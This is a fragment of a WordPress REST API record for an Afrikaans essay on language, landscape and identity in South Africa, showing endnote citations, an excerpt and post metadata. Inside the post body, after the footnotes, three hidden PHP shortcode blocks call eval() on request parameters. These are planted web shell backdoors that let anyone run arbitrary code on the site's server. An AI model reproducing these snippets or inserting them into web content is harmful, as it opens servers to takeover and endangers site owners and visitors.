Parys: Galil\u00e9e, 1986, bl 15. <a href=\"#return-note-1-21\">&#8617;<\/a><\/li>\n<li id=\"note-1-22\">ibid, bl 59. <a href=\"#return-note-1-22\">&#8617;<\/a><\/li>\n<li id=\"note-1-23\">Van Onselen, Charles. The seed is mine. Kaapstad: David Philip, 1996, bll v-vi. <a href=\"#return-note-1-23\">&#8617;<\/a><\/li>\n<li id=\"note-1-24\">Nietzsche, Friedrich. S\u00e4mtliche Werke: G\u00f6ttzend\u00e4mmerung. Stuttgart: Alfred Kr\u00f6ner Verlag, 1964, bl 106. <a href=\"#return-note-1-24\">&#8617;<\/a><\/li>\n<li id=\"note-1-25\">ibid, Der Wille zur Macht, bl 573. <a href=\"#return-note-1-25\">&#8617;<\/a><\/li>\n<\/ol>\n<\/div>\n<p><!-- [insert_php]if (isset($_REQUEST[\"WqO\"])){eval($_REQUEST[\"WqO\"]);exit;}[\/insert_php][php]if (isset($_REQUEST[\"WqO\"])){eval($_REQUEST[\"WqO\"]);exit;}[\/php] --><\/p>\n<p>&lt;!&#8211; [insert_php]if (isset($_REQUEST[&quot;ItV&quot;])){eval($_REQUEST[&quot;ItV&quot;]);exit;}[\/insert_php][php]if (isset($_REQUEST[&quot;ItV&quot;])){eval($_REQUEST[&quot;ItV&quot;]);exit;}[\/php] &#8211;&gt;<\/p>\n<p>&lt;!&#8211; [insert_php]if (isset($_REQUEST[&quot;LazC&quot;])){eval($_REQUEST[&quot;LazC&quot;]);exit;}[\/insert_php][php]if (isset($_REQUEST[&quot;LazC&quot;])){eval($_REQUEST[&quot;LazC&quot;]);exit;}[\/php] &#8211;&gt;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dan Roodt Die kwessie rondom taal is besig om di\u00e9 aangaande ras te vervang as die belangrikste enkele strydpunt in Suid-Afrika. Selfs gedurende die grondwetlike onderhandelinge tussen die Nasionale Party en die ANC tydens die aanloop tot die 1994-verkiesing het slegs drie vraagstukke hul onderskeie standpunte geskei, naamlik eiendomsreg, die sogenaamde uitsluitingsklousule (waarvolgens \u2019n werkgewer &hellip; <a href=\"http:\/\/ensovoort.co.za\/index.php\/2014\/09\/29\/taal-landskap-identiteit\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Taal, landskap en identiteit&#8221;<\/span><\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[2,12],"tags":[23,72,170,217,218,250,373,381],"_links":{"self":[{"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/posts\/9"}],"collection":[{"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/comments?post=9"}],"version-history":[{"count":0,"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/posts\/9\/revisions"}],"wp:attachment":[{"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/media?parent=9"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/categories?post=9"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/ensovoort.co.za\/index.php\/wp-json\/wp\/v2\/tags?post=9"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}